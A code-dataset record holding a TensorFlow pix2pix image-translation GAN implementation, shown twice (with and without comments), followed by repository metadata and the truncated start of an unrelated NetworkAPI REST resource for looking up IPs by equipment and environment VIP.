np.random.choice(glob('./datasets/{}/val/*.jpg'.format(self.dataset_name)), self.batch_size) sample = [load_data(sample_file) for sample_file in data] if (self.is_grayscale): sample_images = np.array(sample).astype(np.float32)[:, :, :, None] else: sample_images = np.array(sample).astype(np.float32) return sample_images def sample_model(self, sample_dir, epoch, idx): sample_images = self.load_random_samples() samples, d_loss, g_loss = self.sess.run( [self.fake_B_sample, self.d_loss, self.g_loss], feed_dict={self.real_data: sample_images} ) save_images(samples, [self.batch_size, 1], './{}/train_{:02d}_{:04d}.png'.format(sample_dir, epoch, idx)) print("[Sample] d_loss: {:.8f}, g_loss: {:.8f}".format(d_loss, g_loss)) def train(self, args): """Train pix2pix""" d_optim = tf.train.AdamOptimizer(args.lr, beta1=args.beta1) \ .minimize(self.d_loss, var_list=self.d_vars) g_optim = tf.train.AdamOptimizer(args.lr, beta1=args.beta1) \ .minimize(self.g_loss, var_list=self.g_vars) init_op = tf.global_variables_initializer() self.sess.run(init_op) self.g_sum = tf.summary.merge([self.d__sum, self.fake_B_sum, self.d_loss_fake_sum, self.g_loss_sum]) self.d_sum = tf.summary.merge([self.d_sum, self.d_loss_real_sum, self.d_loss_sum]) self.writer = tf.summary.FileWriter("./logs", self.sess.graph) counter = 1 start_time = time.time() if self.load(self.checkpoint_dir): print(" [*] Load SUCCESS") else: print(" [!] 
Load failed...") for epoch in xrange(args.epoch): data = glob('./datasets/{}/train/*.jpg'.format(self.dataset_name)) #np.random.shuffle(data) batch_idxs = min(len(data), args.train_size) // self.batch_size for idx in xrange(0, batch_idxs): batch_files = data[idx*self.batch_size:(idx+1)*self.batch_size] batch = [load_data(batch_file) for batch_file in batch_files] if (self.is_grayscale): batch_images = np.array(batch).astype(np.float32)[:, :, :, None] else: batch_images = np.array(batch).astype(np.float32) # Update D network _, summary_str = self.sess.run([d_optim, self.d_sum], feed_dict={ self.real_data: batch_images }) self.writer.add_summary(summary_str, counter) # Update G network _, summary_str = self.sess.run([g_optim, self.g_sum], feed_dict={ self.real_data: batch_images }) self.writer.add_summary(summary_str, counter) # Run g_optim twice to make sure that d_loss does not go to zero (different from paper) _, summary_str = self.sess.run([g_optim, self.g_sum], feed_dict={ self.real_data: batch_images }) self.writer.add_summary(summary_str, counter) errD_fake = self.d_loss_fake.eval({self.real_data: batch_images}) errD_real = self.d_loss_real.eval({self.real_data: batch_images}) errG = self.g_loss.eval({self.real_data: batch_images}) counter += 1 print("Epoch: [%2d] [%4d/%4d] time: %4.4f, d_loss: %.8f, g_loss: %.8f" \ % (epoch, idx, batch_idxs, time.time() - start_time, errD_fake+errD_real, errG)) if np.mod(counter, 100) == 1: self.sample_model(args.sample_dir, epoch, idx) if np.mod(counter, 500) == 2: self.save(args.checkpoint_dir, counter) def discriminator(self, image, y=None, reuse=False): with tf.variable_scope("discriminator") as scope: # image is 256 x 256 x (input_c_dim + output_c_dim) if reuse: tf.get_variable_scope().reuse_variables() else: assert tf.get_variable_scope().reuse == False h0 = lrelu(conv2d(image, self.df_dim, name='d_h0_conv')) # h0 is (128 x 128 x self.df_dim) h1 = lrelu(self.d_bn1(conv2d(h0, self.df_dim*2, name='d_h1_conv'))) # h1 is 
(64 x 64 x self.df_dim*2) h2 = lrelu(self.d_bn2(conv2d(h1, self.df_dim*4, name='d_h2_conv'))) # h2 is (32x 32 x self.df_dim*4) h3 = lrelu(self.d_bn3(conv2d(h2, self.df_dim*8, d_h=1, d_w=1, name='d_h3_conv'))) # h3 is (16 x 16 x self.df_dim*8) h4 = linear(tf.reshape(h3, [self.batch_size, -1]), 1, 'd_h3_lin') return tf.nn.sigmoid(h4), h4 def generator(self, image, y=None): with tf.variable_scope("generator") as scope: s = self.output_size s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128) # image is (256 x 256 x input_c_dim) e1 = conv2d(image, self.gf_dim, name='g_e1_conv') # e1 is (128 x 128 x self.gf_dim) e2 = self.g_bn_e2(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv')) # e2 is (64 x 64 x self.gf_dim*2) e3 = self.g_bn_e3(conv2d(lrelu(e2), self.gf_dim*4, name='g_e3_conv')) # e3 is (32 x 32 x self.gf_dim*4) e4 = self.g_bn_e4(conv2d(lrelu(e3), self.gf_dim*8, name='g_e4_conv')) # e4 is (16 x 16 x self.gf_dim*8) e5 = self.g_bn_e5(conv2d(lrelu(e4), self.gf_dim*8, name='g_e5_conv')) # e5 is (8 x 8 x self.gf_dim*8) e6 = self.g_bn_e6(conv2d(lrelu(e5), self.gf_dim*8, name='g_e6_conv')) # e6 is (4 x 4 x self.gf_dim*8) e7 = self.g_bn_e7(conv2d(lrelu(e6), self.gf_dim*8, name='g_e7_conv')) # e7 is (2 x 2 x self.gf_dim*8) e8 = self.g_bn_e8(conv2d(lrelu(e7), self.gf_dim*8, name='g_e8_conv')) # e8 is (1 x 1 x self.gf_dim*8) self.d1, self.d1_w, self.d1_b = deconv2d(tf.nn.relu(e8), [self.batch_size, s128, s128, self.gf_dim*8], name='g_d1', with_w=True) d1 = tf.nn.dropout(self.g_bn_d1(self.d1), 0.5) d1 = tf.concat([d1, e7], 3) # d1 is (2 x 2 x self.gf_dim*8*2) self.d2, self.d2_w, self.d2_b = deconv2d(tf.nn.relu(d1), [self.batch_size, s64, s64, self.gf_dim*8], name='g_d2', with_w=True) d2 = tf.nn.dropout(self.g_bn_d2(self.d2), 0.5) d2 = tf.concat([d2, e6], 3) # d2 is (4 x 4 x self.gf_dim*8*2) self.d3, self.d3_w, self.d3_b = deconv2d(tf.nn.relu(d2), [self.batch_size, s32, s32, self.gf_dim*8], name='g_d3', with_w=True) d3 = 
tf.nn.dropout(self.g_bn_d3(self.d3), 0.5) d3 = tf.concat([d3, e5], 3) # d3 is (8 x 8 x self.gf_dim*8*2) self.d4, self.d4_w, self.d4_b = deconv2d(tf.nn.relu(d3), [self.batch_size, s16, s16, self.gf_dim*8], name='g_d4', with_w=True) d4 = self.g_bn_d4(self.d4) d4 = tf.concat([d4, e4], 3) # d4 is (16 x 16 x self.gf_dim*8*2) self.d5, self.d5_w, self.d5_b = deconv2d(tf.nn.relu(d4), [self.batch_size, s8, s8, self.gf_dim*4], name='g_d5', with_w=True) d5 = self.g_bn_d5(self.d5) d5 = tf.concat([d5, e3], 3) # d5 is (32 x 32 x self.gf_dim*4*2) self.d6, self.d6_w, self.d6_b = deconv2d(tf.nn.relu(d5), [self.batch_size, s4, s4, self.gf_dim*2], name='g_d6', with_w=True) d6 = self.g_bn_d6(self.d6) d6 = tf.concat([d6, e2], 3) # d6 is (64 x 64 x self.gf_dim*2*2) self.d7, self.d7_w, self.d7_b = deconv2d(tf.nn.relu(d6), [self.batch_size, s2, s2, self.gf_dim], name='g_d7', with_w=True) d7 = self.g_bn_d7(self.d7) d7 = tf.concat([d7, e1], 3) # d7 is (128 x 128 x self.gf_dim*1*2) self.d8, self.d8_w, self.d8_b = deconv2d(tf.nn.relu(d7), [self.batch_size, s, s, self.output_c_dim], name='g_d8', with_w=True) # d8 is (256 x 256 x output_c_dim) return tf.nn.tanh(self.d8) def sampler(self, image, y=None): with tf.variable_scope("generator") as scope: scope.reuse_variables() s = self.output_size s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128) # image is (256 x 256 x input_c_dim) e1 = conv2d(image, self.gf_dim, name='g_e1_conv') # e1 is (128 x 128 x self.gf_dim) e2 = self.g_bn_e2(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv')) # e2 is (64 x 64 x self.gf_dim*2) e3 = self.g_bn_e3(conv2d(lrelu(e2), self.gf_dim*4, name='g_e3_conv')) # e3 is (32 x 32 x self.gf_dim*4) e4 = self.g_bn_e4(conv2d(lrelu(e3), self.gf_dim*8, name='g_e4_conv')) # e4 is (16 x 16 x self.gf_dim*8) e5 = self.g_bn_e5(conv2d(lrelu(e4), self.gf_dim*8, name='g_e5_conv')) # e5 is (8 x 8 x self.gf_dim*8) e6 = self.g_bn_e6(conv2d(lrelu(e5), self.gf_dim*8, name='g_e6_conv')) # 
e6 is (4 x 4 x self.gf_dim*8) e7 = self.g_bn_e7(conv2d(lrelu(e6), self.gf_dim*8, name='g_e7_conv')) # e7 is (2 x 2 x self.gf_dim*8) e8 = self.g_bn_e8(conv2d(lrelu(e7), self.gf_dim*8, name='g_e8_conv')) # e8 is (1 x 1 x self.gf_dim*8) self.d1, self.d1_w, self.d1_b = deconv2d(tf.nn.relu(e8), [self.batch_size, s128, s128, self.gf_dim*8], name='g_d1', with_w=True) d1 = tf.nn.dropout(self.g_bn_d1(self.d1), 0.5) d1 = tf.concat([d1, e7], 3) # d1 is (2 x 2 x self.gf_dim*8*2) self.d2, self.d2_w, self.d2_b = deconv2d(tf.nn.relu(d1), [self.batch_size, s64, s64, self.gf_dim*8], name='g_d2', with_w=True) d2 = tf.nn.dropout(self.g_bn_d2(self.d2), 0.5) d2 = tf.concat([d2, e6], 3) # d2 is (4 x 4 x self.gf_dim*8*2) self.d3, self.d3_w, self.d3_b = deconv2d(tf.nn.relu(d2), [self.batch_size, s32, s32, self.gf_dim*8], name='g_d3', with_w=True) d3 = tf.nn.dropout(self.g_bn_d3(self.d3), 0.5) d3 = tf.concat([d3, e5], 3) # d3 is (8 x 8 x self.gf_dim*8*2) self.d4, self.d4_w, self.d4_b = deconv2d(tf.nn.relu(d3), [self.batch_size, s16, s16, self.gf_dim*8], name='g_d4', with_w=True) d4 = self.g_bn_d4(self.d4) d4 = tf.concat([d4, e4], 3) # d4 is (16 x 16 x self.gf_dim*8*2) self.d5, self.d5_w, self.d5_b = deconv2d(tf.nn.relu(d4), [self.batch_size, s8, s8, self.gf_dim*4], name='g_d5', with_w=True) d5 = self.g_bn_d5(self.d5) d5 = tf.concat([d5, e3], 3) # d5 is (32 x 32 x self.gf_dim*4*2) self.d6, self.d6_w, self.d6_b = deconv2d(tf.nn.relu(d5), [self.batch_size, s4, s4, self.gf_dim*2], name='g_d6', with_w=True) d6 = self.g_bn_d6(self.d6) d6 = tf.concat([d6, e2], 3) # d6 is (64 x 64 x self.gf_dim*2*2) self.d7, self.d7_w, self.d7_b = deconv2d(tf.nn.relu(d6), [self.batch_size, s2, s2, self.gf_dim], name='g_d7', with_w=True) d7 = self.g_bn_d7(self.d7) d7 = tf.concat([d7, e1], 3) # d7 is (128 x 128 x self.gf_dim*1*2) self.d8, self.d8_w, self.d8_b = deconv2d(tf.nn.relu(d7), [self.batch_size, s, s, self.output_c_dim], name='g_d8', with_w=True) # d8 is (256 x 256 x output_c_dim) return tf.nn.tanh(self.d8) 
def save(self, checkpoint_dir, step): model_name = "pix2pix.model" model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size) checkpoint_dir = os.path.join(checkpoint_dir, model_dir) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) self.saver.save(self.sess, os.path.join(checkpoint_dir, model_name), global_step=step) def load(self, checkpoint_dir): print(" [*] Reading checkpoint...") model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size) checkpoint_dir = os.path.join(checkpoint_dir, model_dir) ckpt = tf.train.get_checkpoint_state(checkpoint_dir) if ckpt and ckpt.model_checkpoint_path: ckpt_name = os.path.basename(ckpt.model_checkpoint_path) self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name)) return True else: return False def test(self, args): """Test pix2pix""" init_op = tf.global_variables_initializer() self.sess.run(init_op) sample_files = glob('./datasets/{}/val/*.jpg'.format(self.dataset_name)) # sort testing input n = [int(i) for i in map(lambda x: x.split('/')[-1].split('.jpg')[0], sample_files)] sample_files = [x for (y, x) in sorted(zip(n, sample_files))] # load testing input print("Loading testing images ...") sample = [load_data(sample_file, is_test=True) for sample_file in sample_files] if (self.is_grayscale): sample_images = np.array(sample).astype(np.float32)[:, :, :, None] else: sample_images = np.array(sample).astype(np.float32) sample_images = [sample_images[i:i+self.batch_size] for i in xrange(0, len(sample_images), self.batch_size)] sample_images = np.array(sample_images) print(sample_images.shape) start_time = time.time() if self.load(self.checkpoint_dir): print(" [*] Load SUCCESS") else: print(" [!] 
Load failed...") for i, sample_image in enumerate(sample_images): idx = i+1 print("sampling image ", idx) samples = self.sess.run( self.fake_B_sample, feed_dict={self.real_data: sample_image} ) save_images(samples, [self.batch_size, 1], './{}/test_{:04d}.png'.format(args.test_dir, idx))
44.981481
136
0.572715
from __future__ import division import os import time from glob import glob import tensorflow as tf import numpy as np from six.moves import xrange from ops import * from utils import * class pix2pix(object): def __init__(self, sess, image_size=256, batch_size=1, sample_size=1, output_size=256, gf_dim=64, df_dim=64, L1_lambda=100, input_c_dim=3, output_c_dim=3, dataset_name='facades', checkpoint_dir=None, sample_dir=None): self.sess = sess self.is_grayscale = (input_c_dim == 1) self.batch_size = batch_size self.image_size = image_size self.sample_size = sample_size self.output_size = output_size self.gf_dim = gf_dim self.df_dim = df_dim self.input_c_dim = input_c_dim self.output_c_dim = output_c_dim self.L1_lambda = L1_lambda self.d_bn1 = batch_norm(name='d_bn1') self.d_bn2 = batch_norm(name='d_bn2') self.d_bn3 = batch_norm(name='d_bn3') self.g_bn_e2 = batch_norm(name='g_bn_e2') self.g_bn_e3 = batch_norm(name='g_bn_e3') self.g_bn_e4 = batch_norm(name='g_bn_e4') self.g_bn_e5 = batch_norm(name='g_bn_e5') self.g_bn_e6 = batch_norm(name='g_bn_e6') self.g_bn_e7 = batch_norm(name='g_bn_e7') self.g_bn_e8 = batch_norm(name='g_bn_e8') self.g_bn_d1 = batch_norm(name='g_bn_d1') self.g_bn_d2 = batch_norm(name='g_bn_d2') self.g_bn_d3 = batch_norm(name='g_bn_d3') self.g_bn_d4 = batch_norm(name='g_bn_d4') self.g_bn_d5 = batch_norm(name='g_bn_d5') self.g_bn_d6 = batch_norm(name='g_bn_d6') self.g_bn_d7 = batch_norm(name='g_bn_d7') self.dataset_name = dataset_name self.checkpoint_dir = checkpoint_dir self.build_model() def build_model(self): self.real_data = tf.placeholder(tf.float32, [self.batch_size, self.image_size, self.image_size, self.input_c_dim + self.output_c_dim], name='real_A_and_B_images') self.real_B = self.real_data[:, :, :, :self.input_c_dim] self.real_A = self.real_data[:, :, :, self.input_c_dim:self.input_c_dim + self.output_c_dim] self.fake_B = self.generator(self.real_A) self.real_AB = tf.concat([self.real_A, self.real_B], 3) self.fake_AB = tf.concat([self.real_A, 
self.fake_B], 3) self.D, self.D_logits = self.discriminator(self.real_AB, reuse=False) self.D_, self.D_logits_ = self.discriminator(self.fake_AB, reuse=True) self.fake_B_sample = self.sampler(self.real_A) self.d_sum = tf.summary.histogram("d", self.D) self.d__sum = tf.summary.histogram("d_", self.D_) self.fake_B_sum = tf.summary.image("fake_B", self.fake_B) self.d_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits, labels=tf.ones_like(self.D))) self.d_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits_, labels=tf.zeros_like(self.D_))) self.g_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits_, labels=tf.ones_like(self.D_))) \ + self.L1_lambda * tf.reduce_mean(tf.abs(self.real_B - self.fake_B)) self.d_loss_real_sum = tf.summary.scalar("d_loss_real", self.d_loss_real) self.d_loss_fake_sum = tf.summary.scalar("d_loss_fake", self.d_loss_fake) self.d_loss = self.d_loss_real + self.d_loss_fake self.g_loss_sum = tf.summary.scalar("g_loss", self.g_loss) self.d_loss_sum = tf.summary.scalar("d_loss", self.d_loss) t_vars = tf.trainable_variables() self.d_vars = [var for var in t_vars if 'd_' in var.name] self.g_vars = [var for var in t_vars if 'g_' in var.name] self.saver = tf.train.Saver() def load_random_samples(self): data = np.random.choice(glob('./datasets/{}/val/*.jpg'.format(self.dataset_name)), self.batch_size) sample = [load_data(sample_file) for sample_file in data] if (self.is_grayscale): sample_images = np.array(sample).astype(np.float32)[:, :, :, None] else: sample_images = np.array(sample).astype(np.float32) return sample_images def sample_model(self, sample_dir, epoch, idx): sample_images = self.load_random_samples() samples, d_loss, g_loss = self.sess.run( [self.fake_B_sample, self.d_loss, self.g_loss], feed_dict={self.real_data: sample_images} ) save_images(samples, [self.batch_size, 1], './{}/train_{:02d}_{:04d}.png'.format(sample_dir, epoch, idx)) 
print("[Sample] d_loss: {:.8f}, g_loss: {:.8f}".format(d_loss, g_loss)) def train(self, args): d_optim = tf.train.AdamOptimizer(args.lr, beta1=args.beta1) \ .minimize(self.d_loss, var_list=self.d_vars) g_optim = tf.train.AdamOptimizer(args.lr, beta1=args.beta1) \ .minimize(self.g_loss, var_list=self.g_vars) init_op = tf.global_variables_initializer() self.sess.run(init_op) self.g_sum = tf.summary.merge([self.d__sum, self.fake_B_sum, self.d_loss_fake_sum, self.g_loss_sum]) self.d_sum = tf.summary.merge([self.d_sum, self.d_loss_real_sum, self.d_loss_sum]) self.writer = tf.summary.FileWriter("./logs", self.sess.graph) counter = 1 start_time = time.time() if self.load(self.checkpoint_dir): print(" [*] Load SUCCESS") else: print(" [!] Load failed...") for epoch in xrange(args.epoch): data = glob('./datasets/{}/train/*.jpg'.format(self.dataset_name)) batch_idxs = min(len(data), args.train_size) // self.batch_size for idx in xrange(0, batch_idxs): batch_files = data[idx*self.batch_size:(idx+1)*self.batch_size] batch = [load_data(batch_file) for batch_file in batch_files] if (self.is_grayscale): batch_images = np.array(batch).astype(np.float32)[:, :, :, None] else: batch_images = np.array(batch).astype(np.float32) _, summary_str = self.sess.run([d_optim, self.d_sum], feed_dict={ self.real_data: batch_images }) self.writer.add_summary(summary_str, counter) _, summary_str = self.sess.run([g_optim, self.g_sum], feed_dict={ self.real_data: batch_images }) self.writer.add_summary(summary_str, counter) _, summary_str = self.sess.run([g_optim, self.g_sum], feed_dict={ self.real_data: batch_images }) self.writer.add_summary(summary_str, counter) errD_fake = self.d_loss_fake.eval({self.real_data: batch_images}) errD_real = self.d_loss_real.eval({self.real_data: batch_images}) errG = self.g_loss.eval({self.real_data: batch_images}) counter += 1 print("Epoch: [%2d] [%4d/%4d] time: %4.4f, d_loss: %.8f, g_loss: %.8f" \ % (epoch, idx, batch_idxs, time.time() - start_time, 
errD_fake+errD_real, errG)) if np.mod(counter, 100) == 1: self.sample_model(args.sample_dir, epoch, idx) if np.mod(counter, 500) == 2: self.save(args.checkpoint_dir, counter) def discriminator(self, image, y=None, reuse=False): with tf.variable_scope("discriminator") as scope: if reuse: tf.get_variable_scope().reuse_variables() else: assert tf.get_variable_scope().reuse == False h0 = lrelu(conv2d(image, self.df_dim, name='d_h0_conv')) h1 = lrelu(self.d_bn1(conv2d(h0, self.df_dim*2, name='d_h1_conv'))) h2 = lrelu(self.d_bn2(conv2d(h1, self.df_dim*4, name='d_h2_conv'))) h3 = lrelu(self.d_bn3(conv2d(h2, self.df_dim*8, d_h=1, d_w=1, name='d_h3_conv'))) h4 = linear(tf.reshape(h3, [self.batch_size, -1]), 1, 'd_h3_lin') return tf.nn.sigmoid(h4), h4 def generator(self, image, y=None): with tf.variable_scope("generator") as scope: s = self.output_size s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128) e1 = conv2d(image, self.gf_dim, name='g_e1_conv') e2 = self.g_bn_e2(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv')) e3 = self.g_bn_e3(conv2d(lrelu(e2), self.gf_dim*4, name='g_e3_conv')) e4 = self.g_bn_e4(conv2d(lrelu(e3), self.gf_dim*8, name='g_e4_conv')) e5 = self.g_bn_e5(conv2d(lrelu(e4), self.gf_dim*8, name='g_e5_conv')) e6 = self.g_bn_e6(conv2d(lrelu(e5), self.gf_dim*8, name='g_e6_conv')) e7 = self.g_bn_e7(conv2d(lrelu(e6), self.gf_dim*8, name='g_e7_conv')) e8 = self.g_bn_e8(conv2d(lrelu(e7), self.gf_dim*8, name='g_e8_conv')) self.d1, self.d1_w, self.d1_b = deconv2d(tf.nn.relu(e8), [self.batch_size, s128, s128, self.gf_dim*8], name='g_d1', with_w=True) d1 = tf.nn.dropout(self.g_bn_d1(self.d1), 0.5) d1 = tf.concat([d1, e7], 3) self.d2, self.d2_w, self.d2_b = deconv2d(tf.nn.relu(d1), [self.batch_size, s64, s64, self.gf_dim*8], name='g_d2', with_w=True) d2 = tf.nn.dropout(self.g_bn_d2(self.d2), 0.5) d2 = tf.concat([d2, e6], 3) self.d3, self.d3_w, self.d3_b = deconv2d(tf.nn.relu(d2), [self.batch_size, s32, s32, 
self.gf_dim*8], name='g_d3', with_w=True) d3 = tf.nn.dropout(self.g_bn_d3(self.d3), 0.5) d3 = tf.concat([d3, e5], 3) self.d4, self.d4_w, self.d4_b = deconv2d(tf.nn.relu(d3), [self.batch_size, s16, s16, self.gf_dim*8], name='g_d4', with_w=True) d4 = self.g_bn_d4(self.d4) d4 = tf.concat([d4, e4], 3) self.d5, self.d5_w, self.d5_b = deconv2d(tf.nn.relu(d4), [self.batch_size, s8, s8, self.gf_dim*4], name='g_d5', with_w=True) d5 = self.g_bn_d5(self.d5) d5 = tf.concat([d5, e3], 3) self.d6, self.d6_w, self.d6_b = deconv2d(tf.nn.relu(d5), [self.batch_size, s4, s4, self.gf_dim*2], name='g_d6', with_w=True) d6 = self.g_bn_d6(self.d6) d6 = tf.concat([d6, e2], 3) self.d7, self.d7_w, self.d7_b = deconv2d(tf.nn.relu(d6), [self.batch_size, s2, s2, self.gf_dim], name='g_d7', with_w=True) d7 = self.g_bn_d7(self.d7) d7 = tf.concat([d7, e1], 3) self.d8, self.d8_w, self.d8_b = deconv2d(tf.nn.relu(d7), [self.batch_size, s, s, self.output_c_dim], name='g_d8', with_w=True) return tf.nn.tanh(self.d8) def sampler(self, image, y=None): with tf.variable_scope("generator") as scope: scope.reuse_variables() s = self.output_size s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128) e1 = conv2d(image, self.gf_dim, name='g_e1_conv') e2 = self.g_bn_e2(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv')) e3 = self.g_bn_e3(conv2d(lrelu(e2), self.gf_dim*4, name='g_e3_conv')) e4 = self.g_bn_e4(conv2d(lrelu(e3), self.gf_dim*8, name='g_e4_conv')) e5 = self.g_bn_e5(conv2d(lrelu(e4), self.gf_dim*8, name='g_e5_conv')) e6 = self.g_bn_e6(conv2d(lrelu(e5), self.gf_dim*8, name='g_e6_conv')) e7 = self.g_bn_e7(conv2d(lrelu(e6), self.gf_dim*8, name='g_e7_conv')) e8 = self.g_bn_e8(conv2d(lrelu(e7), self.gf_dim*8, name='g_e8_conv')) self.d1, self.d1_w, self.d1_b = deconv2d(tf.nn.relu(e8), [self.batch_size, s128, s128, self.gf_dim*8], name='g_d1', with_w=True) d1 = tf.nn.dropout(self.g_bn_d1(self.d1), 0.5) d1 = tf.concat([d1, e7], 3) self.d2, self.d2_w, self.d2_b = 
deconv2d(tf.nn.relu(d1), [self.batch_size, s64, s64, self.gf_dim*8], name='g_d2', with_w=True) d2 = tf.nn.dropout(self.g_bn_d2(self.d2), 0.5) d2 = tf.concat([d2, e6], 3) self.d3, self.d3_w, self.d3_b = deconv2d(tf.nn.relu(d2), [self.batch_size, s32, s32, self.gf_dim*8], name='g_d3', with_w=True) d3 = tf.nn.dropout(self.g_bn_d3(self.d3), 0.5) d3 = tf.concat([d3, e5], 3) self.d4, self.d4_w, self.d4_b = deconv2d(tf.nn.relu(d3), [self.batch_size, s16, s16, self.gf_dim*8], name='g_d4', with_w=True) d4 = self.g_bn_d4(self.d4) d4 = tf.concat([d4, e4], 3) self.d5, self.d5_w, self.d5_b = deconv2d(tf.nn.relu(d4), [self.batch_size, s8, s8, self.gf_dim*4], name='g_d5', with_w=True) d5 = self.g_bn_d5(self.d5) d5 = tf.concat([d5, e3], 3) self.d6, self.d6_w, self.d6_b = deconv2d(tf.nn.relu(d5), [self.batch_size, s4, s4, self.gf_dim*2], name='g_d6', with_w=True) d6 = self.g_bn_d6(self.d6) d6 = tf.concat([d6, e2], 3) self.d7, self.d7_w, self.d7_b = deconv2d(tf.nn.relu(d6), [self.batch_size, s2, s2, self.gf_dim], name='g_d7', with_w=True) d7 = self.g_bn_d7(self.d7) d7 = tf.concat([d7, e1], 3) self.d8, self.d8_w, self.d8_b = deconv2d(tf.nn.relu(d7), [self.batch_size, s, s, self.output_c_dim], name='g_d8', with_w=True) return tf.nn.tanh(self.d8) def save(self, checkpoint_dir, step): model_name = "pix2pix.model" model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size) checkpoint_dir = os.path.join(checkpoint_dir, model_dir) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) self.saver.save(self.sess, os.path.join(checkpoint_dir, model_name), global_step=step) def load(self, checkpoint_dir): print(" [*] Reading checkpoint...") model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size) checkpoint_dir = os.path.join(checkpoint_dir, model_dir) ckpt = tf.train.get_checkpoint_state(checkpoint_dir) if ckpt and ckpt.model_checkpoint_path: ckpt_name = os.path.basename(ckpt.model_checkpoint_path) self.saver.restore(self.sess, 
os.path.join(checkpoint_dir, ckpt_name)) return True else: return False def test(self, args): init_op = tf.global_variables_initializer() self.sess.run(init_op) sample_files = glob('./datasets/{}/val/*.jpg'.format(self.dataset_name)) n = [int(i) for i in map(lambda x: x.split('/')[-1].split('.jpg')[0], sample_files)] sample_files = [x for (y, x) in sorted(zip(n, sample_files))] print("Loading testing images ...") sample = [load_data(sample_file, is_test=True) for sample_file in sample_files] if (self.is_grayscale): sample_images = np.array(sample).astype(np.float32)[:, :, :, None] else: sample_images = np.array(sample).astype(np.float32) sample_images = [sample_images[i:i+self.batch_size] for i in xrange(0, len(sample_images), self.batch_size)] sample_images = np.array(sample_images) print(sample_images.shape) start_time = time.time() if self.load(self.checkpoint_dir): print(" [*] Load SUCCESS") else: print(" [!] Load failed...") for i, sample_image in enumerate(sample_images): idx = i+1 print("sampling image ", idx) samples = self.sess.run( self.fake_B_sample, feed_dict={self.real_data: sample_image} ) save_images(samples, [self.batch_size, 1], './{}/test_{:04d}.png'.format(args.test_dir, idx))
true
true
f705d70956f36d8ea51f2996a072dc5971196a83
10,385
py
Python
networkapi/ip/resource/IPEquipEvipResource.py
vinicius-marinho/GloboNetworkAPI
94651d3b4dd180769bc40ec966814f3427ccfb5b
[ "Apache-2.0" ]
73
2015-04-13T17:56:11.000Z
2022-03-24T06:13:07.000Z
networkapi/ip/resource/IPEquipEvipResource.py
leopoldomauricio/GloboNetworkAPI
3b5b2e336d9eb53b2c113977bfe466b23a50aa29
[ "Apache-2.0" ]
99
2015-04-03T01:04:46.000Z
2021-10-03T23:24:48.000Z
networkapi/ip/resource/IPEquipEvipResource.py
shildenbrand/GloboNetworkAPI
515d5e961456cee657c08c275faa1b69b7452719
[ "Apache-2.0" ]
64
2015-08-05T21:26:29.000Z
2022-03-22T01:06:28.000Z
# -*- coding: utf-8 -*- # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging from networkapi.admin_permission import AdminPermission from networkapi.ambiente.models import EnvironmentVip from networkapi.auth import has_perm from networkapi.equipamento.models import Equipamento from networkapi.equipamento.models import EquipamentoError from networkapi.equipamento.models import EquipamentoNotFoundError from networkapi.exception import EnvironmentVipNotFoundError from networkapi.exception import InvalidValueError from networkapi.grupo.models import GrupoError from networkapi.infrastructure.xml_utils import dumps_networkapi from networkapi.infrastructure.xml_utils import loads from networkapi.infrastructure.xml_utils import XMLError from networkapi.ip.models import IpError from networkapi.ip.models import IpNotFoundByEquipAndVipError from networkapi.ip.models import NetworkIPv4Error from networkapi.ip.models import NetworkIPv4NotFoundError from networkapi.rest import RestResource from networkapi.rest import UserNotAuthorizedError from networkapi.util import is_valid_int_greater_zero_param from networkapi.util import is_valid_regex from networkapi.util import is_valid_string_maxsize from networkapi.util import is_valid_string_minsize class 
IPEquipEvipResource(RestResource): log = logging.getLogger('IPEquipEvipResource') def handle_post(self, request, user, *args, **kwargs): """Handles POST requests to get all Ips (v4) or (v6) of equip on Divisao DC and Ambiente Logico of fisrt Network4 and 6 (if exists) of Environment Vip. URL: ip/getbyequipandevip/ """ self.log.info('Get Ips by Equip - Evip') try: # User permission if not has_perm(user, AdminPermission.IPS, AdminPermission.READ_OPERATION): raise UserNotAuthorizedError( None, u'User does not have permission to perform the operation.') # Load XML data xml_map, attrs_map = loads(request.raw_post_data) # XML data format networkapi_map = xml_map.get('networkapi') if networkapi_map is None: msg = u'There is no value to the networkapi tag of XML request.' self.log.error(msg) return self.response_error(3, msg) ip_map = networkapi_map.get('ip_map') if ip_map is None: msg = u'There is no value to the ip tag of XML request.' self.log.error(msg) return self.response_error(3, msg) # Get XML data id_evip = ip_map.get('id_evip') equip_name = ip_map.get('equip_name') # Valid id_evip if not is_valid_int_greater_zero_param(id_evip): self.log.error( u'Parameter id_evip is invalid. Value: %s.', id_evip) raise InvalidValueError(None, 'id_evip', id_evip) # Valid equip_name if not is_valid_string_minsize(equip_name, 3) or not 